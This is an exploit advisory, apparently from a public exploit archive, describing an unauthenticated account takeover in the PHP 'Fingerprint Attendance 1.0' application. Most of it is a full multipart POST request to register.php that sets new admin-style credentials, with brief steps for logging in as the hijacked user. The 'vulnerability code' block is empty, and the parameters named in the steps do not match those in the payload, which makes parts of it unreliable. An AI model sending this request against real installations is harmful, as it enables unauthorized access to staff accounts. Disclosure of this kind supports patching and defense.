# Title: Fingerprint Attendance 1.0 Account Takeover # Author: Hejap Zairy # Date: 29.07.2022 # Vendor: https://www.vetbossel.in/fingerprint-attendance-project-php/ # Software: https://app.box.com/s/xlyqalhvayq8oi25tqykcbouzrrjytqy # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache Fingerprint Attendance is vulnerable to unauthenticated account takeover. An attacker can takeover any registered 'Staff' user account by just sending below POST request By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters #Steps to Reproduce 1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters. 2. Go to /fingerprint/src/ and Log in to the user account by changed username and password #vulnerability Code php ``` ``` # Description: Account takeover is one form of identity theft attack in which bad actors gain access to an account and make unauthorized transactions. Account takeover attacks can target any website that uses a login to guard valuable information [+] Payload POST ``` POST /fingerprint/src/register.php HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3324626841792192532944123116 Content-Length: 2446 Origin: http://0day.gov Connection: close Referer: http://0day.gov/fingerprint/src/register.php Cookie: PHPSESSID=64cp9kf4qmus9p55o63clicu2q Upgrade-Insecure-Requests: 1 -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="fname" Admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="lname" admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="NRIC" Admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="emailaddress" Admin@gmail.com -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="contact" admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="contact2" admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="password" admin12345 -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="line2" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="line3" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="city" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="zip" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="country" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="bankName" Admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="bankDetail" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="job" Admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="button" Register -----------------------------3324626841792192532944123116-- ```